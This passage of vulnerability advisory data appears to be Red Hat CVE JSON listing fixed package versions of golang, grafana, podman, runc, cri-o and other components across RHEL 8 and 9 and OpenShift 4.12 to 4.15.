Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "8090020240313170136.26eb71ac", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "grafana-pcp", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.1.1-2.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "grafana", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:9.2.10-8.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "grafana", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:9.2.10-16.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "container-tools:rhel8", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "8100020240808093819.afee755d", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "osbuild-composer", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:101-2.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "golang", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.20.12-2.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "grafana", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:9.2.10-8.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "grafana-pcp", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.1.1-2.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "golang", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.21.9-2.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "grafana", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:9.2.10-16.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "grafana-pcp", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.1.1-2.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "buildah", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.33.7-3.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:4.9.4-5.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "gvisor-tap-vsock", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "6:0.7.3-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.14.3-3.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "runc", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:1.1.12-3.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_e4s:9.0::appstream" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:4.2.0-4.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_e4s:9.0::appstream" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.0.1-6.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "golang", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.19.13-7.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:4.4.1-20.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "buildah", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.23.4-5.2.rhaos4.12.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "butane", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.16.0-2.2.rhaos4.12.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-1.1.rhaos4.12.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "cri-o", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.25.3-5.2.rhaos4.12.git44a2cb2.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "cri-tools", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.25.0-2.2.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.14.0-5.2.rhaos4.12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.12.0-202403251017.p0.gd4c9e3c.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:4.2.0-7.2.rhaos4.12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "runc", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:1.1.6-5.2.rhaos4.12.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.12::el8", "cpe:/a:redhat:openshift:4.12::el9" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat OpenShift Container Platform 4.12", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.9.4-3.2.rhaos4.12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "buildah", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.29.1-2.2.rhaos4.13.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-1.1.rhaos4.13.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "cri-o", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.26.5-11.1.rhaos4.13.git919cc6e.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "cri-tools", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.26.0-4.1.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.15.0-7.1.rhaos4.13.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.13.0-202404020737.p0.gd192e90.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:4.4.1-6.2.rhaos4.13.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "runc", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:1.1.12-1.1.rhaos4.13.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.13::el8", "cpe:/a:redhat:openshift:4.13::el9" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat OpenShift Container Platform 4.13", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.11.2-2.2.rhaos4.13.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "butane", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.19.0-1.3.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-1.2.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "cri-o", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.27.4-6.1.rhaos4.14.gitd09e4c0.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "cri-tools", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.27.0-3.1.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.16.2-2.1.rhaos4.14.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202403261640.p0.gf7b14a9.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "ose-aws-ecr-image-credential-provider", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202403251040.p0.g607e2dd.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:4.4.1-11.3.rhaos4.14.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.11.2-10.3.rhaos4.14.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "buildah", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.29.1-10.4.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "butane", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.19.0-1.4.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "conmon", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:2.1.7-3.4.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-1.3.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "cri-o", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.27.4-7.2.rhaos4.14.git082c52f.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "cri-tools", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.27.0-3.2.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.16.2-2.2.rhaos4.14.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404160939.p0.g7bee54d.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift4-aws-iso", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404151639.p0.gd2acdd5.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift-ansible", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404151639.p0.g81558cc.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift-clients", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404151639.p0.gf7b14a9.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "openshift-kuryr", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404151639.p0.g8926a29.assembly.stream.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "ose-aws-ecr-image-credential-provider", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.0-202404151639.p0.g607e2dd.assembly.stream.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "podman", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "3:4.4.1-11.4.rhaos4.14.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "runc", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "4:1.1.12-1.2.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "skopeo", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "2:1.11.2-10.4.rhaos4.14.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9" ], "defaultStatus": "affected", "packageName": "microshift", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.14.19-202403280926.p0.gc1f8861.assembly.4.14.19.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://catalog.redhat.com/software/containers/", "cpes": [ "cpe:/a:redhat:openshift:4.14::el9", "cpe:/a:redhat:openshift:4.14::el8" ], "defaultStatus": "affected", "packageName": "rhcos", "product": "Red Hat OpenShift Container Platform 4.14", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "414.92.202407300859-0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "buildah", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.29.1-20.3.rhaos4.15.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "butane", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:0.20.0-1.1.rhaos4.15.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "containernetworking-plugins", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "1:1.4.0-1.2.rhaos4.15.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "cri-o", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.28.4-8.rhaos4.15.git24f50b9.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "cri-tools", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:1.28.0-3.1.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:openshift:4.15::el9", "cpe:/a:redhat:openshift:4.15::el8" ], "defaultStatus": "affected", "packageName": "ignition", "product": "Red Hat OpenShift Container Platform 4.15", "vendor": "Red Hat", "versions": [ 